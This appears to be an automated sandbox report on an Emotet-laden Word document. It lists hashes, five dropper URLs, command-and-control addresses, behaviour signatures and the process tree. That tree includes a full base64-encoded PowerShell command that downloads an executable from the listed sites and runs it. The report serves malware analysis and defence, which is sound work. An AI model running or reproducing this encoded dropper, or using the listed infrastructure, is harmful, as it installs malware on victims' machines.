Analysis

  • max time kernel
    27s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 14:31

General

  • Target

    e26770b3b31d5ccb38ad534ab7cd8a42d994a1fe321220247c3c53dcd02dfd8d.doc

  • Size

    169KB

  • MD5

    1950eb80d33f9251e9b3f12fe13a16d9

  • SHA1

    1cf3914fbef10544c4d9a508d21171ff54452d52

  • SHA256

    e26770b3b31d5ccb38ad534ab7cd8a42d994a1fe321220247c3c53dcd02dfd8d

  • SHA512

    6801e49fc632b8eb288ecb232b533d724aece3e2d823c770154c52033f3dbcd1a5f15dfaaa1412defdefe1bfb19873c6cc83ee21ca9be6c65b495f154186808f

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://mc-interiorismo.com/theme/Rk/

exe.dropper

http://mc130.com/SHB/KloCHjT/

exe.dropper

http://mentarimedia.com/modules/p6N365/

exe.dropper

http://mellysphotography.com/large/Rem220541/

exe.dropper

http://vipmein.com/assets2/6eeP7BwazY/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e26770b3b31d5ccb38ad534ab7cd8a42d994a1fe321220247c3c53dcd02dfd8d.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Modifies registry class
    PID:1424
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABPAFYASQBGAFQAagBjAGQAPQAnAFgAUgBBAEMAUQBiAG8AawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAcgBgAGkAVABgAFkAUAByAGAAbwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFUAWgBHAFAAVQBjAG0AaQAgAD0AIAAnADYANAAxACcAOwAkAE4AUwBHAFMATABwAHoAZAA9ACcAQwBWAFAASwBXAHQAcwBoACcAOwAkAE4ARwBSAEQAUQBwAHQAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBaAEcAUABVAGMAbQBpACsAJwAuAGUAeABlACcAOwAkAEkATQBIAEIATgBrAHcAegA9ACcAUwBKAEUAQQBKAG0AegB2ACcAOwAkAFAARgBUAFgARgBpAHkAdwA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgBXAGUAYgBDAEwAaQBlAG4AdAA7ACQAUQBKAFYATABEAG0AdQBkAD0AJwBoAHQAdABwADoALwAvAG0AYwAtAGkAbgB0AGUAcgBpAG8AcgBpAHMAbQBvAC4AYwBvAG0ALwB0AGgAZQBtAGUALwBSAGsALwAqAGgAdAB0AHAAOgAvAC8AbQBjADEAMwAwAC4AYwBvAG0ALwBTAEgAQgAvAEsAbABvAEMASABqAFQALwAqAGgAdAB0AHAAOgAvAC8AbQBlAG4AdABhAHIAaQBtAGUAZABpAGEALgBjAG8AbQAvAG0AbwBkAHUAbABlAHMALwBwADYATgAzADYANQAvACoAaAB0AHQAcAA6AC8ALwBtAGUAbABsAHkAcwBwAGgAbwB0AG8AZwByAGEAcABoAHkALgBjAG8AbQAvAGwAYQByAGcAZQAvAFIAZQBtADIAMgAwADUANAAxAC8AKgBoAHQAdABwADoALwAvAHYAaQBwAG0AZQBpAG4ALgBjAG8AbQAvAGEAcwBzAGUAdABzADIALwA2AGUAZQBQADcAQgB3AGEAegBZAC8AJwAuACIAUwBwAGAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJAEQAWABQAFQAZwBoAGEAPQAnAEgARwBFAEkAWQB1AGUAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBQAFMAWABFAHIAZwBkACAAaQBuACAAJABRAEoAVgBMAEQAbQB1AGQAKQB7AHQAcgB5AHsAJABQAEYAVABYAEYAaQB5AHcALgAiAGQAbwB3AE4AbABvAEEAYABkAGYASQBgAEwAZQAiACgAJABTAFAAUwBYAEUAcgBnAGQALAAgACQATgBHAFIARABRAHAAdAByACkAOwAkAEYATQBGAFYAVgBsAHQAaAA9ACcAUABDAEwARABMAGEAbwBrACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQATgBHAFIARABRAHAAdAByACkALgAiAGwAYABFAE4ARwB0AEgAIgAgAC0AZwBlACAAMgAyADcANAA1ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBgAEUAQQBUAEUAIgAoACQATgBHAFIARABRAHAAdAByACkAOwAkAFMAUwBCAFQATQBhAG8AdAA9ACcASgBMAEoAVwBHAGgAdABqACcAOwBiAHIAZQBhAGsAOwAkAE0ASABMAFcATQBsAHIAeQA9ACcARABWAEQAVQBOAHEAcQBrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAUwBUAFUASABzAGIAeAA9ACcARwBGAEYAVgBTAHIAbwB4ACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1496
  • C:\Users\Admin\641.exe
    C:\Users\Admin\641.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Drops file in System32 directory
    PID:552
    • C:\Windows\SysWOW64\KBDLAO\RpcDiag.exe
      "C:\Windows\SysWOW64\KBDLAO\RpcDiag.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1516

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/552-10-0x00000000003D0000-0x00000000003DC000-memory.dmp

    Filesize

    48KB

  • memory/1424-2-0x0000000008A30000-0x0000000008A34000-memory.dmp

    Filesize

    16KB

  • memory/1424-3-0x0000000007030000-0x0000000007230000-memory.dmp

    Filesize

    2.0MB

  • memory/1424-4-0x000000000AFA0000-0x000000000AFA4000-memory.dmp

    Filesize

    16KB

  • memory/1424-5-0x000000000C020000-0x000000000C024000-memory.dmp

    Filesize

    16KB

  • memory/1424-6-0x0000000007030000-0x0000000007230000-memory.dmp

    Filesize

    2.0MB

  • memory/1424-7-0x0000000007030000-0x0000000007230000-memory.dmp

    Filesize

    2.0MB

  • memory/1516-13-0x0000000000360000-0x000000000036C000-memory.dmp

    Filesize

    48KB